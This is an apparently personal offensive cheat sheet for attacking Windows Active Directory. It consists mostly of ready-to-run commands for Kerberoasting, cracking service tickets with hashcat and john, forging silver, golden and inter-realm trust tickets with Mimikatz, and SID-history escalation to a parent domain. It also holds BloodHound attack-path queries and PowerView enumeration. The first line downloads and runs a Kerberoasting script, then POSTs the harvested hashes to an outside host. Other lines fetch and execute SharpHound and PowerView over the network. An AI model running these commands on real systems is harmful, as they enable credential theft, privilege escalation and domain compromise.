IEX (New-Object Net.WebClient).DownloadString('http://192.168.49.126:8080/Invoke-Kerberoast.ps1');$command = Invoke-Kerberoast -OutputFormat Hashcat | out-string;$errors=[string]$error;$postParams = @{Error=$errors;output=$command;};Invoke-WebRequest -Uri http://192.168.49.126:8000 -Method POST -Body $postParams;  
## Step 5 – Crack the Tickets - kirbi((Windows file format) is a file contains tickets, it can be convert to ccache(Linux file format)   
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.corp.local~1433-CORP.LOCAL.kirbi  
or  
for i in $(cat kirbi.list);do python3 kirbi2john.py $i >> tgs.list;done  
sudo john --show --wordlist=/usr/shar/wordlists/rockyou.txt tgs.list  
or  
hashcat mssql.krb.tgs --force -m 13100 -a 0 /usr/share/wordlists/rockyou.txt  
## Step 6 -  Rewrite  
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.corp.local~1433-CORP.LOCAL.kirbi -w sql.kirbi -u 500  # Make user appear to be a different user  
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.corp.local~1433-CORP.LOCAL.kirbi -w sql.kirbi -g 512  # Add user to another group (in this case Domain Admin)  
## Step 7 - Inject back into RAM with Mimikatz  
kerberos::ptt sql.kirbi  
  
## Kerberos Silver Ticket  
## Step 1 – Extract NTLM password hash for either a service account running a service on a computer or the computer account itself (e.g. via Kerberoasting or by obtain local administrator accounts on a host)  
service account: can be compromised without any elevated domain privileges  
computer account: can forge tickets for any service that runs as the local system account  
## Step 2 - Using the Mimikatz command “kerberos::golden”, pass the Domain SID, Target host name, Service name, User name and Group information to create the Silver Ticket  
mimikatz "kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目标服务器主机名> /service:<服务类型> /rc4:<NTLMHash> /user:<用户名> /ptt" exit  
kerberos::golden /sid:S-1-5-21-4172452648-1021989953-2368502130-1105 /domain:offense.local /ptt /id:1155 /target:dc-mantvydas.offense.local /service:http /rc4:a87f3a337d73085c45f9416be5787d86 /user:beningnadmin  
## Step 3 - Validate the tickets  
klist  
## Step 4 - Query the service using forged tickets  
Invoke-WebRequest -UseBasicParsing -UseDefaultCredentials http://dc-mantvydas.offense.local  
  
## Service Type: Service Silver Tickets  
WMI: HOST, RPCSS  
PowerShell Remoting: HOST,HTTP  
Depending on OS version may also need: WSMAN, RPCSS  
WinRM: HOST,HTTP  
Scheduled Tasks: HOST  
Windows File Share (CIFS): CIFS  
LDAP operations including Mimikatz DCSync: LDAP  
Windows Remote Server Administration Tools: RPCSS, LDAP, CIFS  
SQL servers, instances: MSSQLSvc  
RDP: TERMSERV  
Exachange Client Access Servers: exchangeMDB  
Microsoft SCCM: CmRcService  
#Service Principal Names (SPNs) Descriptions - https://adsecurity.org/?page_id=183  
  
## kerberos pre-authentication  
GetNPUsers.py: This example will attempt to list and get TGTs for those users that have the property 'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH). Output is compatible with JtR.  
GetNPUsers.py corp.local/ -dc-ip 172.16.1.5 -request -format hashcat -outputfile output_AS_REP_responses_file  
$krb5asrep$23$  
  
## SID Hopping Up Intra-Forest Trusts - ExtraSids - if you compromise the domain controller of a child domain in a forest, you can compromise its entire parent domain  
prerequisits: krbtgt NTLM on child domain  
  
Get-DomainSID -Domain dev.ADMIN.OFFSHORE.COM    # child domain  
S-1-5-21-1416445593-394318334-2645530166  
  
Get-DomainSID -Domain ADMIN.OFFSHORE.COM        # parent domain  
S-1-5-21-1216317506-3509444512-4230741538  
  
kerberos::golden /domain:dev.ADMIN.OFFSHORE.COM /sid:S-1-5-21-1416445593-394318334-2645530166 /sids:S-1-5-21-1216317506-3509444512-4230741538-519 /rc4:9404def404bc198fd9830a3483869e78 /user:administrator /ptt  
  
## Golden Trust Ticket (on DC)  
In order for authentication to occur across a domain trust, the kerberos key distribution centers (KDCs) in two domains must have a shared secret, called an inter-realm key.  
This key is derived from a shared password, and rotates approximately every 30 days. Parent-child domains share an inter-realm key implicitly.  
When a user in domain A tries to authenticate or access a resource in domain B that he has established access to, he presents his ticket-granting-ticket (TGT) and request for a service ticket to the KDC for domain A.  
The KDC for A determines that the resource is not in its realm, and issues the user a referral ticket.  
This referral ticket is a ticket-granting-ticket (TGT) encrypted with the inter-realm key shared by domain A and B.   
  
sekurlsa::trust  
sekurlsa::trust /patch  
kerberos::golden /domain:A.local /sid:S-1-5-21-1415 /rc4:273891243234 /user:administrator /service:krbtgt /target:B.local /ticket:rainbow.administrator.A.local@B.local.kirbi  
asktgs rainbow.administrator.A.local@B.local.kirbi cifs/pc.B.local cifs/dc.B.local  
kirbikator lsa cifs.pc.B.local.kirbi cifs.dc.B.local.kirbi  
  
## Sensitive file hunting script  
using powershell to check sensitive file which is even hidden in c:\users or C:\ folder, can define it manually  
dir c:\ /b /s | findstr "flag.txt"  
  
####################################################################################################  
########################################     Domain Recon    #######################################  
####################################################################################################  
  
## Check powershell module location and modules  
$env:PSModulePath  
Get-Module  
  
## AdminCount=1  
When a user, group, or computer is added, either directly or transitively, to any of a specific set of protected groups its value is updated to 1  
  
## Abusable ACEs  
ForceChangePassword    # The ability to change the target user’s password without knowing the current value. Abused with Set-DomainUserPassword.  
AddMembers             # The ability to add arbitrary users, groups or computers to the target group. Abused with Add-DomainGroupMember.  
GenericAll             # Full object control, including the ability to add other principals to a group, change a user password without knowing its current value, register an SPN with a user object, etc. Abused with Set-DomainUserPassword or Add-DomainGroupMember.  
GenericWrite           # The ability to update any non-protected target object parameter value. For example, update the “scriptPath” parameter value on a target user object to cause that user to run your specified executable/commands the next time that user logs on. Abused with Set-DomainObject.  
WriteOwner             # The ability to update the owner of the target object. Once the object owner has been changed to a principal the attacker controls, the attacker may manipulate the object any way they see fit. Abused with Set-DomainObjectOwner.  
WriteDACL              # The ability to write a new ACE to the target object’s DACL. For example, an attacker may write a new ACE to the target object DACL giving the attacker “full control” of the target object. Abused with Add-NewADObjectAccessControlEntry.  
AllExtendedRights      # The ability to perform any action associated with extended Active Directory rights against the object. For example, adding principals to a group and force changing a target user’s password are both examples of extended rights. Abused with Set-DomainUserPassword or Add-DomainGroupMember.  
  
## Object-specific Rights we care about  
Users:  
Computers:  
User-Force-Change-Password, write to ServicePrincipalName, no password required, trusted for Kerberos delegation, read the value of LAPS passwords  
Unconstrained Delegation  
  
Groups: write to member property  
GPOs: modification of GPC-File-Sys-Path  
Domains: WriteDacl to add DCSync right  
  
## Get a specified user  
Get-ADUser -Filter "Name -eq 'ChewDavid'" -SearchBase "DC=AppNC" -Properties "mail" -Server lds.Fabrikam.com:50000  

## get a specified service account
Get-ADServiceAccount -Identity web_svc -Properties *

## Attributes of domain user  
Get-DomainUser harmj0y | ConvertFrom-UACValue -ShowAll  
Name                           Value  
----                           -----  
SCRIPT                         1  
ACCOUNTDISABLE                 2  
HOMEDIR_REQUIRED               8  
LOCKOUT                        16  
PASSWD_NOTREQD                 32  
PASSWD_CANT_CHANGE             64  
ENCRYPTED_TEXT_PWD_ALLOWED     128  
TEMP_DUPLICATE_ACCOUNT         256  
NORMAL_ACCOUNT                 512+  
INTERDOMAIN_TRUST_ACCOUNT      2048  
WORKSTATION_TRUST_ACCOUNT      4096  
SERVER_TRUST_ACCOUNT           8192  
DONT_EXPIRE_PASSWORD           65536+  
MNS_LOGON_ACCOUNT              131072  
SMARTCARD_REQUIRED             262144  
TRUSTED_FOR_DELEGATION         524288  
NOT_DELEGATED                  1048576  
USE_DES_KEY_ONLY               2097152  
DONT_REQ_PREAUTH               4194304  
PASSWORD_EXPIRED               8388608  
TRUSTED_TO_AUTH_FOR_DELEGATION 16777216  
PARTIAL_SECRETS_ACCOUNT        67108864  
  
## ADACLScanner  
https://github.com/canix1/ADACLScanner  
A tool with GUI or command linte used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory.  
PS C:\scripts> .\ADACLScanner.ps1 -Base "DC=contoso,DC=com" -Filter "(&(AdminCount=1))" -Scope subtree -EffectiveRightsPrincipal User1 -Output HTML -Show  
  
## Bloodhound  
sudo neo4j console  
/opt/BloodHound/BloodHound-linux-x64/BloodHound --no-sandbox  
on victim:  
SharpHound.exe --CollectionMethod All  # Run Under Admin Privilege!!!  
SharpHound.exe --CollectionMethod Session --Loop --Loopduration 01:00:00  
SharpHound.exe --CollectionMethod All --Domain dev.ADMIN.OFFSHORE.COM    # By default, the SharpHound will only extract the data from current domain. For other trusted domain, it requires to be specified.  
  
## Invoke-BloodHound for domain recon  
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('http://10.10.14.5:8888/SharpHound.ps1');Invoke-BloodHound -CollectionMethod All"  
PS C:\> Invoke-BloodHound  
PS C:\> Invoke-BloodHound -Loop -LoopInterval 00:01:00 -LoopDuration 00:10:00  
PS C:\> Invoke-BloodHound -CollectionMethod All  
  
## Find all computers  
MATCH p = (d:Domain)-[r:Contains*1..]->(c:Computer) RETURN p  
MATCH p = (d:Domain)-[r:Contains*1..]->(c:Computer) WHERE c.owned = true RETURN p  
  
## Find all users  
MATCH p = (d:Domain)-[r:Contains*1..]->(u:User) RETURN p  
MATCH p = (d:Domain)-[r:Contains*1..]->(u:User) WHERE u.owned = true RETURN p  
  
## Shortest Path from All Owned Objects - 3 hops  
MATCH p=shortestPath((c {owned: true})-[*1..3]->(s)) WHERE NOT c = s RETURN p  
  
## Shortest Path from Owned Computers - max hops  
MATCH p=shortestPath((c {owned: true})-[*1..]->(s:Computer)) WHERE NOT c = s RETURN p  
MATCH p=shortestPath((c {owned: true, domain:"CORP.LOCAL"})-[*1..]->(s:Computer)) WHERE NOT c = s RETURN p  
  
## Shortest Path from Owned Users - 2 hops  
MATCH p=shortestPath((c {owned: true})-[*1..2]->(s:User)) WHERE NOT c = s RETURN p  
MATCH p=shortestPath((c {owned: true, domain:"CORP.LOCAL"})-[*1..2]->(s:User)) WHERE NOT c = s RETURN p  
  
## Find the active user sessions on all domain computers:   
MATCH p1=shortestPath(((u1:User)-[r1:MemberOf*1..]->(g1:Group))) MATCH p2=(c:Computer)-[*1]->(u1) RETURN p2  
  
## All Shortest Paths to Domain (including Computers)  
MATCH p = allShortestPaths((uc)-[r:{}*1..]->(d:Domain)) WHERE (uc:User OR uc:Computer) RETURN p  
  
## Find LAPS enabled computers  
MATCH p = (d:Domain)-[r:Contains*1..]->(c:Computer) WHERE c.haslaps = true RETURN p  
  
## All Shortest Paths to LAPS enabled computers  
MATCH p = allShortestPaths((uc)-[r:{}*1..]->(c:Computer)) WHERE (uc:User OR uc:Computer) AND NOT uc = c AND c.haslaps = true RETURN p  
  
## Find LAPS disabled computers  
MATCH p = (d:Domain)-[r:Contains*1..]->(c:Computer) WHERE c.haslaps = false RETURN p  
  
## All Shortest Paths to no LAPS  
MATCH p = allShortestPaths((uc)-[r:{}*1..]->(c:Computer)) WHERE (uc:User OR uc:Computer) AND NOT uc = c AND c.haslaps = false RETURN p  
  
## All Shortest Paths from Kerberoastable Users to Computers  
MATCH p = allShortestPaths((u:User)-[r:{}*1..]->(c:Computer)) WHERE u.hasspn = true RETURN p  
  
## All Shortest Paths from Kerberoastable Users to High Value Targets  
MATCH p = allShortestPaths((u:User)-[r:{}*1..]->(h)) WHERE u.hasspn = true AND h.highvalue = true RETURN p  
  
## All Shortest Paths from Owned User  
MATCH p = allShortestPaths((u:User)-[r:{}*1..]->(a)) WHERE u.owned = true AND u <> a RETURN p  
  
## All Shortest Paths from Owned Principals to Domain  
MATCH p = allShortestPaths((o)-[r:{}*1..]->(d:Domain)) WHERE o.owned = true RETURN p  
  
## All Shortest Paths from Owned Principals to High Value Targets  
MATCH p = allShortestPaths((o)-[r:{}*1..]->(h)) WHERE o.owned = true AND h.highvalue = true RETURN p  
  
## All Shortest Paths from Owned Principals to no LAPS  
MATCH p = allShortestPaths((o)-[r:{}*1..]->(c:Computer)) WHERE NOT o = c AND o.owned = true AND c.haslaps = false RETURN p  
  
## All Shortest Paths from no Signing to Domain  
MATCH p = allShortestPaths((c:Computer)-[r:{}*1..]->(d:Domain)) WHERE c.hassigning = false RETURN p  
  
## All Shortest Paths from no Signing to High Value Targets  
MATCH p = allShortestPaths((c:Computer)-[r:{}*1..]->(d:Domain)) WHERE c.hassigning = false RETURN p  
  
## All Constrained Delegations  
MATCH p = (a)-[:AllowedToDelegate]->(c:Computer) RETURN p  
  
## All Computers Allowed to Delegate for Another Computer  
MATCH p = (c1:Computer)-[:AllowedToDelegate]->(c2:Computer) RETURN p  
  
## All ACLs to Computers (excluding High Value Targets)  
MATCH p = (ucg)-[r]->(c:Computer) WHERE (ucg:User OR ucg:Computer OR ucg:Group) AND ucg.highvalue = false AND r.isacl = true RETURN p  
  
## All Computers Local Admin to Another Computer  
MATCH p = (ucg)-[r]->(c:Computer) WHERE (ucg:User OR ucg:Computer OR ucg:Group) AND ucg.highvalue = false AND r.isacl = true RETURN p  
  
## All Owned Principals  
MATCH p = (d:Domain)-[r:Contains*1..]->(h) WHERE h.highvalue = true RETURN p  
  
## All Users with \"Pass\" in AD Description  
MATCH p = (d:Domain)-[r:Contains*1..]->(u:User) WHERE u.description =~ '(?i).*pass.*' RETURN p  
  
## All Users with Password not Required  
MATCH p = (d:Domain)-[r:Contains*1..]->(u:User) WHERE u.passwordnotreqd = true RETURN p  
  
## Find interesting edges related to “ACL Abuse” that uprivileged users have against other users:     
MATCH (n:User {admincount:False}) MATCH (m:User) WHERE NOT m.name = n.name MATCH p=allShortestPaths((n)-[r:AllExtendedRights|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner*1..]->(m)) RETURN p  
  
## Find interesting edges related to “ACL Abuse” that unprivileged users have against computers:          
MATCH (n:User {admincount:False}) MATCH p=allShortestPaths((n)-[r:AllExtendedRights|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|AdminTo|CanRDP|ExecuteDCOM|ForceChangePassword*1..]->(m:Computer)) RETURN p  
  
## Find if unprivileged users have rights to add members into groups:  
MATCH (n:User {admincount:False}) MATCH p=allShortestPaths((n)-[r:AddMember*1..]->(m:Group)) RETURN p  
  
## Find only the AdminTo privileges (edges) of the domain users against the domain computers:  
MATCH p1=shortestPath(((u1:User)-[r1:MemberOf*1..]->(g1:Group))) MATCH p2=(c:Computer)-[*1]->(u1) RETURN p2  
  
## find the shortest path from a not high value node to a specific user group  
MATCH p=shortestPath((u {highvalue: false})-[*1..]->(g:Group {name: 'DOMAIN ADMINS@CORP.LOCAL'})) WHERE NOT (u)-[:MemberOf*1..]->(:Group {highvalue: true}) RETURN p  
  
## Shortest paths to Domain Admins group from the Domain Users group:   
MATCH p=(m:Computer)-[r:HasSession]->(n:User {domain: "CORP.LOCAL"}) RETURN p  
  
## Shortest paths to Domain Admins group from non privileged users:  
MATCH (n:User {admincount:false}),(m:Group {name:'DOMAIN ADMINS@corp.local'}),p=shortestPath((n)-[r:MemberOf|HasSession|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|CanRDP|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GpLink|AddAllowedToAct|AllowedToAct*1..]->(m)) RETURN p  
  
## Find all the Edges that any UNPRIVILEGED user (based on the admincount:False) has against all the nodes:   
MATCH (n:User {admincount:false}),(m:Group {name:'DOMAIN ADMINS@corp.local'}),p=shortestPath((n)-[r:MemberOf|HasSession|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|CanRDP|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GpLink|AddAllowedToAct|AllowedToAct*1..]->(m)) RETURN p  
  
################################################################################  
################### Domain Enumeration + Exploitation ##########################  
################################################################################  
  
## import AD module  
import-module ActiveDirectory  
## if not installed AD module on the target  
C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.ActiveDirectory.Management      
Import-Module .\Microsoft.ActiveDirectory.Management.dll  
Get-Command get-adcom*    # check if AD module imported successfully  
  
## Check for accounts that don't have password expiry set - "Non expiring passwords are bad. Especially if it's a regular unexpected user, might be IOC [indicator of compromise] then."  
Get-ADUser -Server "Dc02.dev.ADMIN.OFFSHORE.COM" -Filter 'useraccountcontrol -band 65536' -Properties useraccountcontrol | export-csv U-DONT_EXPIRE_PASSWORD.csv  
Get-ADcomputer -Filter 'useraccountcontrol -band 65536' -Properties useraccountcontrol  
  
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=65536)"  
  
## Check for accounts that have no password requirement  
Get-ADUser -Server "Dc02.dev.ADMIN.OFFSHORE.COM" -Filter 'useraccountcontrol -band 32' -Properties useraccountcontrol | export-csv U-PASSWD_NOTREQD.csv  
Get-ADcomputer -Server "Dc02.dev.ADMIN.OFFSHORE.COM" -Filter 'useraccountcontrol -band 32' -Properties useraccountcontrol  
$Cred = New-Object System.Management.Automation.PSCredential('dev.ADMIN.OFFSHORE.COM\joe', (new-object System.Security.SecureString))  
  
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=32)"  
  
## Accounts that have the password stored in a reversibly encrypted format - "Because storing your password in reversible encryption is really bad."  
Get-ADUser -Server "Dc02.dev.ADMIN.OFFSHORE.COM" -Filter 'useraccountcontrol -band 128' -Properties useraccountcontrol | export-csv U-ENCRYPTED_TEXT_PWD_ALLOWED.csv  
Get-ADcomputer -Filter 'useraccountcontrol -band 128' -Properties useraccountcontrol  
  
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=128)"  
  
## List users that are trusted for Kerberos delegation - "Because unconstrained Kerberos delegation means that random service account can make Kerberos tickets for EVERYONE"  
Get-ADUser -Server "Dc02.dev.ADMIN.OFFSHORE.COM" -Filter 'useraccountcontrol -band 524288' -Properties useraccountcontrol | export-csv U-TRUSTED_FOR_DELEGATION.csv  
Get-ADcomputer -Filter 'useraccountcontrol -band 524288' -Properties useraccountcontrol  
  
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)"  
  
## List accounts that don't require pre-authentication - "Pre auth puts your time stamp encrypted into the request to help against attacks."  
Get-ADUser -Server "Dc02.dev.ADMIN.OFFSHORE.COM" -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | export-csv U-DONT_REQUIRE_PREAUTH.csv  
Get-ADcomputer -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol  
  
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=4194304)"  
  
## List accounts that have credentials encrypted with DES - "Because DES = plaintext essentially."  
Get-ADUser -Server "Dc02.dev.ADMIN.OFFSHORE.COM" -Filter 'useraccountcontrol -band 2097152' -Properties useraccountcontrol | export-csv U-USE_DES_KEY_ONLY.csv  
Get-ADcomputer -Filter 'useraccountcontrol -band 2097152' -Properties useraccountcontrol  
  
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=2097152)"  
  
## LAPS - Check if unprivileged domain accounts, able to read the value of LAPS passwords  
The local admin password is stored in the confidential ms-Mcs-AdmPwd attribute on computer objects  
Right to read AdmPwd: DS_Control_Accessss/GnericAll/Owner/WriteDCAL/WriteOwner  
  
### LAPSToolkit  
https://github.com/leoloobeek/LAPSToolkit/LAPSToolkit.ps1  
Get-LAPSComputers            # Displays all computers with LAPS enabled, password expriation, and password if user has access  
Find-LAPSDelegatedGroups     # Searches through all OUs to see which AD groups can read the ms-Mcs-AdmPwd attribute  
Find-AdmPwdExtendedRights    # Parses through ExtendedRights for each AD computer with LAPS enabled and looks for which group has read access and if any user has "All Extended Rights".  
  
Find-AdmPwdExtendedRights               # "Audits" who can read ms-Mcs-AdmPwd  
Get-DomainComputer FS01 -Properties name,ms-mcs-AdmPwd  
or  
use AD Explorer -> search container -> class: common classes -> Attribute: ms-Mcs-AdmPwd -> Relation: not empty  
  
Once found it, you can login as local administrator.  
  
## Enumerate User DACLs  
$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid  
Get-DomainObjectACL -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}  
  
## Enumerate Foreign Group  
Get-DomainForeignGroupMember -Domain ops.comply.com  
  
## Enumerate domain trust mapping  
Get-DomainTrustMapping  
  
## Check who can set Unconstrained Delegation  
1. User with SeEnableDelegationPrivilege enabled (Local Security Policy of a domain controller and managed through Group Policy)  
Get-DomainUser -AllowDelegation -AdminCount  
  
2. Object permissions to msDS-AllowedToDelegateTo attribute, userAccountControl, and/or servicePrincipalName  
Get-DomainComputer -Unconstrained  
  
## Check Constrained Delegation  
Get-DomainUser -TrustedToAuth    # Hunting for user accounts that have kerberos constrained delegation enabled  
Attribute msds-allowedtodelegateto    # Identifies the SPNs of services  
Attribute useraccountcontrol          # TRUSTED_TO_AUTH_FOR_DELEGATION  
  
Get-DomainComputer -TrustedToAuth | select name, msds-allowedtodelegateto, useraccountcontrol | fl    # Hunting for computer accounts that have kerberos constrained delegation enabled  
Get-DomainComputer ws02 | Select-Object -ExpandProperty msds-allowedtodelegateto | fl    # Identifies the SPNs of services  
  
## To find out which user could remotely access one remote computer,try Get-NetLocalGroups and Get-NetLocalGroupMember.(The function only returns information to which the caller has Read access.)  
    The users in BUILTIN\Administrators and BUILTIN\Remote Desktop Users can using RDP  
    The users in BUILTIN\Administrators and BUILTIN\Remote Management Users can using WinRM  
    The domain computer was assigned GPO which enabled "Computer Configuration > Policies > Windows Settings > Security Settings > Restricted Groups -> Add Group -> domain group"  
Get-NetLocalGroup -ComputerName primary.testlab.local  
Get-NetLocalGroupMember -ComputerName primary.testlab.local | ft  
  
## Enumerate Network Shares  
### scan an entire domain:  
find-domainshare -computerdomain burmat.local  
  
### narrow down scope, check permissions:  
find-domainshare -computername websrv.burmat.local -computerdomain burmat.local -CheckShareAccess  
  
## PowerView - https://github.com/PowerShellMafia/PowerSploit/tree/dev/Recon  
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');  
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.10.14.2:8000/PowerView.ps1');  
  
## Misc Functions:  
Export-PowerViewCSV             -   thread-safe CSV append  
Resolve-IPAddress               -   resolves a hostname to an IP  
ConvertTo-SID                   -   converts a given user/group name to a security identifier (SID)  
Convert-ADName                  -   converts object names between a variety of formats  
ConvertFrom-UACValue            -   converts a UAC int value to human readable form  
Add-RemoteConnection            -   pseudo "mounts" a connection to a remote path using the specified credential object  
Remove-RemoteConnection         -   destroys a connection created by New-RemoteConnection  
Invoke-UserImpersonation        -   creates a new "runas /netonly" type logon and impersonates the token  
Invoke-RevertToSelf             -   reverts any token impersonation  
Get-DomainSPNTicket             -   request the kerberos ticket for a specified service principal name (SPN)  
Invoke-Kerberoast               -   requests service tickets for kerberoast-able accounts and returns extracted ticket hashes  
Get-PathAcl                     -   get the ACLs for a local/remote file path with optional group recursion  
  
## Domain/LDAP Functions  
Get-DomainDNSZone               -   enumerates the Active Directory DNS zones for a given domain  
Get-DomainDNSRecord             -   enumerates the Active Directory DNS records for a given zone  
Get-Domain                      -   returns the domain object for the current (or specified) domain  
Get-DomainController            -   return the domain controllers for the current (or specified) domain  
Get-Forest                      -   returns the forest object for the current (or specified) forest  
Get-ForestDomain                -   return all domains for the current (or specified) forest  
Get-ForestGlobalCatalog         -   return all global catalogs for the current (or specified) forest  
Find-DomainObjectPropertyOutlier-   inds user/group/computer objects in AD that have 'outlier' properties set  
Get-DomainUser                  -   return all users or specific user objects in AD  
New-DomainUser                  -   creates a new domain user (assuming appropriate permissions) and returns the user object  
Set-DomainUserPassword          -   sets the password for a given user identity and returns the user object  
Get-DomainUserEvent             -   enumerates account logon events (ID 4624) and Logon with explicit credential events  
Get-DomainComputer              -   returns all computers or specific computer objects in AD  
Get-DomainObject                -   returns all (or specified) domain objects in AD  
Set-DomainObject                -   modifies a gven property for a specified active directory object  
Get-DomainObjectAcl             -   returns the ACLs associated with a specific active directory object  
Add-DomainObjectAcl             -   adds an ACL for a specific active directory object  
Find-InterestingDomainAcl       -   finds object ACLs in the current (or specified) domain with modification rights set to non-built in objects  
Get-DomainOU                    -   search for all organization units (OUs) or specific OU objects in AD  
Get-DomainSite                  -   search for all sites or specific site objects in AD  
Get-DomainSubnet                -   search for all subnets or specific subnets objects in AD  
Get-DomainSID                   -   returns the SID for the current domain or the specified domain  
Get-DomainGroup                 -   return all groups or specific group objects in AD  
New-DomainGroup                 -   creates a new domain group (assuming appropriate permissions) and returns the group object  
Get-DomainManagedSecurityGroup  -   returns all security groups in the current (or target) domain that have a manager set  
Get-DomainGroupMember           -   return the members of a specific domain group  
Add-DomainGroupMember           -   adds a domain user (or group) to an existing domain group, assuming appropriate permissions to do so  
Get-DomainFileServer            -   returns a list of servers likely functioning as file servers  
Get-DomainDFSShare              -   returns a list of all fault-tolerant distributed file systems for the current (or specified) domain  
  
## GPO functions  
Get-DomainGPO                           -   returns all GPOs or specific GPO objects in AD  
Get-DomainGPOLocalGroup                 -   returns all GPOs in a domain that modify local group memberships through 'Restricted Groups' or Group Policy preferences  
Get-DomainGPOUserLocalGroupMapping      -   enumerates the machines where a specific domain user/group is a member of a specific local group, all through GPO correlation  
Get-DomainGPOComputerLocalGroupMapping  -   takes a computer (or GPO) object and determines what users/groups are in the specified local group for the machine through GPO correlation  
Get-DomainPolicy                        -   returns the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller  
  
## Computer Enumeration Functions  
Get-NetLocalGroup                   -   enumerates the local groups on the local (or remote) machine  
Get-NetLocalGroupMember             -   enumerates members of a specific local group on the local (or remote) machine  
Get-NetShare                        -   returns open shares on the local (or a remote) machine  
Get-NetLoggedon                     -   returns users logged on the local (or a remote) machine  
Get-NetSession                      -   returns session information for the local (or a remote) machine  
Get-RegLoggedOn                     -   returns who is logged onto the local (or a remote) machine through enumeration of remote registry keys  
Get-NetRDPSession                   -   returns remote desktop/session information for the local (or a remote) machine  
Test-AdminAccess                    -   rests if the current user has administrative access to the local (or a remote) machine  
Get-NetComputerSiteName             -   returns the AD site where the local (or a remote) machine resides  
Get-WMIRegProxy                     -   enumerates the proxy server and WPAD conents for the current user  
Get-WMIRegLastLoggedOn              -   returns the last user who logged onto the local (or a remote) machine  
Get-WMIRegCachedRDPConnection       -   returns information about RDP connections outgoing from the local (or remote) machine  
Get-WMIRegMountedDrive              -   returns information about saved network mounted drives for the local (or remote) machine  
Get-WMIProcess                      -   returns a list of processes and their owners on the local or remote machine  
Find-InterestingFile                -   searches for files on the given path that match a series of specified criteria  
  
## Threaded 'Meta'-Functions  
Find-DomainUserLocation             -   finds domain machines where specific users are logged into  
Find-DomainProcess                  -   finds domain machines where specific processes are currently running  
Find-DomainUserEvent                -   finds logon events on the current (or remote domain) for the specified users  
Find-DomainShare                    -   finds reachable shares on domain machines  
Find-InterestingDomainShareFile     -   searches for files matching specific criteria on readable shares in the domain  
Find-LocalAdminAccess               -   finds machines on the local domain where the current user has local administrator access  
Find-DomainLocalGroupMember         -   enumerates the members of specified local group on machines in the domain  
  
## Domain Trust Functions  
Get-DomainTrust                     -   returns all domain trusts for the current domain or a specified domain  
Get-ForestTrust                     -   returns all forest trusts for the current forest or a specified forest  
Get-DomainForeignUser               -   enumerates users who are in groups outside of the user's domain  
Get-DomainForeignGroupMember        -   enumerates groups with users outside of the group's domain and returns each foreign member  
Get-DomainTrustMapping              -   this function enumerates all trusts for the current domain and then enumerates all trusts for each domain it finds  
  
## Examples  
Find-DomainUserLocation -UserAdminCount -Domain dev.ADMIN.OFFSHORE.COM                              # Enumerates computers in dev.testlab.local and returns user results for privileged users in dev.testlab.local.  
Find-DomainUserLocation -Domain dev.ADMIN.OFFSHORE.COM -UserIdentity svc_devops -UserDomain corp.local -CheckAccess  
Get-NetLocalGroup -ComputerName DC02.dev.ADMIN.OFFSHORE.COM                                         # Enumerates the local groups on the local (or remote) machine.  
Get-NetLocalGroupMember -ComputerName DC02.dev.ADMIN.OFFSHORE.COM -GroupName CORP_admins | ft       # Enumerates members of a specific local group on the local (or remote) machine.   
Find-DomainShare -CheckShareAccess|Out-File -FilePath sharefinder.txt                         # Look for shares on network and check access under current user context & Log to file  
Find-DomainShare -Domain testlab.local -Credential $Cred                                      # Searches for domain shares in the testlab.local domain using the specified alternate credentials.  
  
Get-DomainGroup "Domain Admins" | Get-DomainGroupMember                                       # Discover Admin Accounts: Group Enumeration  
Get-DomainGroup "*admins*" | Get-DomainGroupMember -Recurse | ?{$_.MmberName -Like '*$'}      # Attack of the Machines - find Computers with Admin Rights  
Get-DomainGroup "*admins*" | Get-DomainGroupMember -Recurse | ?{$_.MmberName -Like '*.*'}     # Discover Users with Admin Rights  
Get-DomainGroup "*Hyper*" | Get-DomainGroupMember                                             # Discover Virtual Admins  
Get-DomainGroup "*VMWare*" | Get-DomainGroupMember                                            # Discover Virtual Admins  
Get-DomainGroup "*admin*"" | select distinguishedname  
Get-DomainGroup "*admin*"" -Properties samaccountname | Get-DomainGroupMember  
Get-DomainGroup -Domain dev.ADMIN.OFFSHORE.COM -Credential $cred | select distinguishedname  
Get-DomainGroup -Properties samaccountname -Identity 'S-1-5-21-890171859-3433809279-3366196753-1117' | fl  
  
"Power Users" | Get-DomainGroupMember -Domain testing                                         # gets a list of all current users in a specified domain group  
"Denied RODC Password Replication Group" | Get-DomainGroupMember                              # Discover Admin Accounts – RODC Groups  
"Cumtomized Domain Group Name"| Get-DomainGroupMember   
'Desktop Admins' | Get-DomainGroupMember -Recurse  
  
Get-DomainObjectAcl -domain corp.local -Identity svc_testldap                                 # returns the ACLs associated with a specific active directory object  
